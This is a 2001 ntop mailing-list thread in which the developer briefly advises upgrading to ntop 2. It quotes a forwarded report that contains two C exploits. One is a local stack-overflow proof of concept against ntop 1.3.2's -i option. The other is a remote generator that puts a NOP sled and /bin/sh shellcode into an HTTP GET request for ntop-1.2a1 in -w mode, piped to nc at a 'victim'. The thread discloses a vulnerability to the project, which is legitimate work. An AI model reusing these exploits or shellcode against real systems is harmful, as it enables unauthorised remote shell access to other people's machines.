Alexei,
please move to ntop 2.

Thanks, Luca

----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Thursday, October 11, 2001 9:31 AM
Subject: [Ntop] ntop hack:((((((((((((((


> Hi,
> Look at that!!!
>
> Source
>
> http://www.webdoc.ru/text.phtml?level=2&id=98&script_id=237&url=texts/201-300/237.html
>
> (in Russian; use the online translator on altavista.com)
>
> tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`
>
> 24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
> 07:04:32 PM build)
> 24/Oct/2000:12:32:16 Listening on
> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> 24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <[EMAIL PROTECTED]>
> 24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
> 24/Oct/2000:12:32:16 Initialising...
> Segmentation fault
> tshaw:/home/cb/ntop-1.3.2$
>
>
> EXPLOIT
> ========
>
> #include <stdlib.h>
> #include <string.h>
> #include <stdio.h>
>
> #define LEN 208 /* bytes main() fills in buf before the words it appends through p */
>
> int main (int argc, char **argv) /* Local proof-of-concept, kept as posted: it re-runs
>   ./ntop with an oversized -i argument, the same input path as the
>   segfault transcript earlier in this message. */
> {
> char buf[LEN + 12]; /* LEN filler bytes plus room for the three stores made through p (12 assumes 4-byte int) */
> intret = 0xbffffba0; /* hard-coded stack address guess, adjustable via argv[1]; it depends on a predictable stack layout, which address randomisation removes */
> int*p;
>
> char code[]= /* opaque machine-code payload, kept byte-for-byte; it ends in the literal /bin/sh */
> "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
> "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> if (argc > 1) {
> ret += atoi(argv[1]); /* optional signed adjustment to the address guess */
>
> fprintf(stderr, "Using ret %#010x\n", ret);
> }
>
> memset(buf, '\x90', LEN); /* 0x90 filler; long runs of this byte in an argument or request are a classic detection signature */
> memcpy(buf + LEN - strlen(code), code, strlen(code)); /* payload placed at the end of the filler region */
>
> p = (int *) (buf + LEN);
>
> *p++ = ret;
> *p++ = ret;
> *p = 0; /* the zero word terminates the string handed to execl */
>
>  execl("./ntop", "ntop", "-i", buf, NULL); /* The defect is in ntop, not here: judging
>   by the crash transcript, ntop 1.3.2 handles the -i value without a
>   length check (inferred, not shown on this page). The reply at the
>   top of the thread advises moving to ntop 2. */
>
> }
>
>
> REMOTE EXPLOIT
> =================
>
> #include <stdio.h>
> #include <string.h>
>
>
> char shellcode[] = /* opaque machine-code payload, reproduced as posted; the same
>   bytes form the tail of code[] in the local listing and end in the
>   literal /bin/sh */
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> void usage() /* Prints the banner and exits with status 0. The banner names
>   ntop-1.2a1 in -w mode, an older release than the 1.3.2 build in the
>   transcript; main() in this listing never calls this function. */
> {
>  printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
>  printf(" [EMAIL PROTECTED]\n");
>  printf("Usage : ./ntop-w-exp | nc victim port\n");
>  exit(0);
> }
>
> void main( int argc, char *argv[] ) /* Generator as posted: writes a single HTTP
>   request to stdout whose path is CODE_LEN bytes of binary data. Per
>   the usage() banner it concerns ntop-1.2a1 running with -w. */
> {
> int i,offset=-24;
> #define CODE_LEN 240 /* total bytes emitted after the GET / prefix */
> #define NOP_LEN 50 /* leading 0x90 filler bytes */
> char code_buf[CODE_LEN];
> unsigned long esp=0xbedffb00; /* hard-coded stack address guess, shifted by offset; relies on a predictable stack layout */
>
> if(argc >= 2) offset = atoi(argv[1]);
>
> memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
> memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
> for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4) /* rest of the buffer is the repeated address guess */
>  *(long *)&code_buf[i]=(unsigned long)esp-offset;
>
> printf("GET /"); /* Defender view: a request path this long, holding 0x90 runs
>   and non-printable bytes, is anomalous and straightforward to flag at
>   a proxy or IDS. The durable fix is presumably a length check in the
>   request parsing of ntop (not shown on this page), or upgrading as
>   the reply advises. */
> for(i=0;i<CODE_LEN; i++)
> {
>  putchar(code_buf[i]);
> }
> printf("\r\n\r\n");
> }
>
>
>
> Mit freundlichen Grüßen
>
> Alexei Voronine
>
> dvg Hannover
> OE352 UNIX Server Control Center (USCC)
> e-Mail   [EMAIL PROTECTED]
> Tel:       0511-5102-3703
>
>
> _______________________________________________
> Ntop mailing list
> [EMAIL PROTECTED]
> http://listmanager.unipi.it/mailman/listinfo/ntop
>
